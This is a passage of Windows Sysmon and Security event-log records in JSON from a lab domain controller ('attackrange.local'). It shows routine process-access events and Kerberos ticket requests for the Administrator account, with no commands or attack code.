07:59:09.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4826,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4827,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4828,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.158\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20CD-5F25-0000-0010BFA10700}\r\nTargetProcessId: 4376\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.158","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20CD-5F25-0000-0010BFA10700}","TargetProcessId":"4376","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4829,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.158\r\nSourceProcessGUID: {41C8662E-20CD-5F25-0000-0010BFA10700}\r\nSourceProcessId: 4376\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-00108C7D0600}\r\nTargetProcessId: 1592\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.158","SourceProcessGUID":"{41C8662E-20CD-5F25-0000-0010BFA10700}","SourceProcessId":"4376","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-00108C7D0600}","TargetProcessId":"1592","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4830,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.174\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20CD-5F25-0000-001047A10700}\r\nTargetProcessId: 1592\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.174","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20CD-5F25-0000-001047A10700}","TargetProcessId":"1592","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4831,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.190\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nSourceProcessId: 1312\r\nSourceThreadId: 2552\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20CD-5F25-0000-001047A10700}\r\nTargetProcessId: 1592\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.190","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","SourceProcessId":"1312","SourceThreadId":"2552","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20CD-5F25-0000-001047A10700}","TargetProcessId":"1592","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4832,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.190\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.190","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220543,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220544,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{40EAEECF-64DC-C99D-2812-C18FD1E8F572}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{40EAEECF-64DC-C99D-2812-C18FD1E8F572}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
